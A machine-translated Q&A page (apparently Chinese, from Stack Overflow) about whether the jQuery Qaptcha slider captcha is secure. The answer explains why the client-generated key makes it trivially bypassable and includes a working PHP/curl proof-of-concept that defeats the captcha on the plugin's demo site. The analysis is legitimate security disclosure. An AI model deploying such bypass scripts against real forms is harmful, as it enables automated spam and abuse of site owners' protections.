见JQuery的Qaptcha的演示在这里- http://www.myjqueryplugins.com/QapTcha/demo
它需要你滑块来解锁,并证明你是人类滑动。 我读过所有关于它是如何设置随机字段值,并删除他们,但不是通过javascript调用所做的一切? 如果是的话那么就不是一个机器人只需要运行JavaScript方法,然后qaptcha坏了?
帮我明白这是怎么安全...
Answer 1:
不幸的是,这并不似乎是一个安全的验证码。
在这篇文章的末尾是一些示例代码,可以绕过它。 我写这个剧本不看任何他们的源代码(PHP或JavaScript)。 我只是闻了几HTTP请求,看到它在做什么,并试图效仿。 现在我已经看过他们的JS代码,但仍然不是PHP,所以即使没有看到任何的源代码,这可能被绕过。
我很快猜测它是如何工作的基础上的成功和失败:
- 您加载其网页上的表格,一个PHP会话与想必没有数据创建的。
- JS脚本被加载,其产生qaptcha_key并将其追加到窗体。
- 这个密钥由JavaScript创建,而不是存储在服务器上(还)。
- 您将滑块移动到右侧,jQuery的岗位“qaptcha_key”通过Ajax到PHP,然后将密钥存储在会话(关键不是秘密)。
- 您提交,其中包括将先前已通过Ajax,如果你移动滑块发送qaptcha_key形式。
- 如果匹配的qaptcha_key存在于会话(从移动滑块),的形式被认为是有效的。 如果没有这样的项存在,他们认为你没有移动滑块(或有JS禁用),以及从会话不包含qaptcha_key,形式是无效的。
是否可以变得更安全? 不容易在我的意见。 为了安全,秘密必须被存储在服务器上,它无法通过任何脚本或HTTP请求到服务器容易获得。 也就是说,使得基于一些公共价值来验证自己仍然可以使用Ajax或HTTP请求像下面我举的例子伪造一个Ajax请求。 基本上,验证码溶液必须存储在服务器上,并且由人(希望不是计算机)解释和发送回服务器。
以下是你可以运行绕过它的代码。 基本上,如果你运行它,你会看到:
Form can be submited
First Name : A Test
Last Name : Of Qaptcha
在所得到的输出。 正如你可以在代码中看到,我只是使用相同的密钥一遍又一遍。 不要紧,关键是什么,因为客户端通知密钥的服务器,当你提交表单,Qaptcha只是检查是否伴随着表单提交的值相匹配什么是存储在PHP会话。 因此,关键的值是无关紧要的,你只需要告诉服务器它是什么,提交表单前。
我怀疑它只是一个时间的问题垃圾邮件发送者实施Qaptcha形成一种广泛使用旁路并将其集成到他们的蜘蛛之前。
概念验证:
<?php
$COOKIE_FILE = '/tmp/cookies.txt'; // The cookie file to use for storing the PHP session ID cookie
$FIRST_NAME = 'A Test'; // first name to send
$LAST_NAME = 'Of Qaptcha'; // last name to send
if (file_exists($COOKIE_FILE)) unlink($COOKIE_FILE); // clear cookies on start - just prevents re-using the same PHPSESSID over and over
$fake_qaptcha_key = 'thisIsAFakeKey12345'; // arbitrary qaptcha_key - normally generated by client JavaScript
// fetch the form - this creates a PHP session and gives us a cookie (yum)
$first = fetch_url('http://demos.myjqueryplugins.com/qaptcha/');
// This step is important - this stores a "qaptcha_key" in the PHP session that matches our session cookie
// We can make the key up in this step, it doesn't matter what it is or where it came from
$params = array('action' => 'qaptcha', 'qaptcha_key' => $fake_qaptcha_key);
$second = fetch_url('http://demos.myjqueryplugins.com/qaptcha/php/Qaptcha.jquery.php', 'POST', $params);
// Now submit the form along with the same qaptcha_key we told the server about in the last step
// As long as a form field is submitted that has the same name as the qaptcha_key we just told the server about, the captcha is bypassed
$params = array('firstname' => $FIRST_NAME, 'lastname' => $LAST_NAME, $fake_qaptcha_key => '', 'submit' => 'Submit Form');
$third = fetch_url('http://demos.myjqueryplugins.com/qaptcha/', 'POST', $params);
// echo the contents so you can see it said form was accepted.
echo $third;
// basic function that uses curl to fetch a URL with get/post
function fetch_url($url, $method = 'GET', $params = array())
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_COOKIEJAR, $GLOBALS['COOKIE_FILE']);
curl_setopt($ch, CURLOPT_COOKIEFILE, $GLOBALS['COOKIE_FILE']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
if ($method == 'POST') {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
}
$return = curl_exec($ch);
return $return;
}
我希望清楚地回答了这个问题为您服务。
文章来源: Qaptcha - is it effective?
{var%20f='http://v.t.sina.com.cn/share/share.php?appkey=1515056452',u=z||d.location,p=['&url=',e(u),'&title=',e(t||d.title),'&source=',e(r),'&sourceUrl=',e(l),'&content=',c||'gb2312','&pic=',e(p||'')].join('');function%20a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=440,height=430,left=',(s.width-440)/2,',top=',(s.height-430)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent))setTimeout(a,0);else%20a();})(screen,document,encodeURIComponent,'','','https://img.manongdao.com/sparkler-677774__340.jpg', '推荐 我欲成王,谁敢阻挡 的文章《Qaptcha - 它是有效的?(Qaptcha - is it effective?)》','https://www.manongdao.com/article-1012108.html','页面编码gb2312|utf-8默认gb2312'));){kind=link}